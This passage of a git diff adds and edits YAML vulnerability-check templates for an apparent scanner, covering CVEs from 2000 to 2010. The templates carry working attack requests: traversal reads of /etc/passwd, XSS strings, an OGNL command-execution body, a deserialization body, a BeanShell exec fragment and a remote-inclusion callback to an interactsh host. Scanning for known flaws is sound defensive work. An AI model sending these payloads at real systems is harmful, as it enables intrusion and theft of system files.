Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");

27
cves/2000/CVE-2000-0114.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft
requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"

25
cves/2001/CVE-2001-1473.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-1"

35
cves/2002/CVE-2002-1131.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

30
cves/2004/CVE-2004-0519.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

2
cves/2005/CVE-2005-2428.yaml
View File

@ -5,7 +5,7 @@ info:
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference: |
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

26
cves/2005/CVE-2005-4385.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"

30
cves/2006/CVE-2006-1681.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html

25
cves/2006/CVE-2006-2842.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

29
cves/2007/CVE-2007-0885.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

27
cves/2007/CVE-2007-4504.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

4
cves/2007/CVE-2007-4556.yaml
View File

@ -15,14 +15,14 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

32
cves/2007/CVE-2007-5728.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2007-5728
info:
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin
reference: https://www.exploit-db.com/exploits/30090
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
requests:
- method: GET
path:
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

2
cves/2008/CVE-2008-2650.yaml
View File

@ -21,5 +21,5 @@ requests:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"
part: body

27
cves/2008/CVE-2008-4668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-4764.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-5587.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-5587
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/exploits/7363
tags: cve2008,lfi,phppgadmin
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6080.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6172.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6222.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

2
cves/2009/CVE-2009-0545.yaml
View File

@ -17,4 +17,4 @@ requests:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"

28
cves/2009/CVE-2009-0932.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2009-0932
info:
name: Horde - Horde_Image::factory driver Argument LFI
author: pikpikcu
severity: high
description: |
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

13
cves/2009/CVE-2009-1151.yaml
View File

@ -4,9 +4,10 @@ info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
@ -16,11 +17,7 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
@ -32,4 +29,4 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:.*:0:0:"

27
cves/2009/CVE-2009-1496.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

24
cves/2009/CVE-2009-1558.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2009/CVE-2009-1872.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion 8 linked XSS vulnerabilies
author: princechaddha
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
tags: cve,cve2009,adobe,xss,coldfusion
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2009/CVE-2009-2015.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-2100.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3053.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-3318.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-4202.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
cves/2009/CVE-2009-4223.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
author: geeknik
severity: high
tags: cve,cve2009,krweb,rfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"

27
cves/2009/CVE-2009-4679.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2009/CVE-2009-5114.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0157.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2010/CVE-2010-0467.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0696.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0759.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
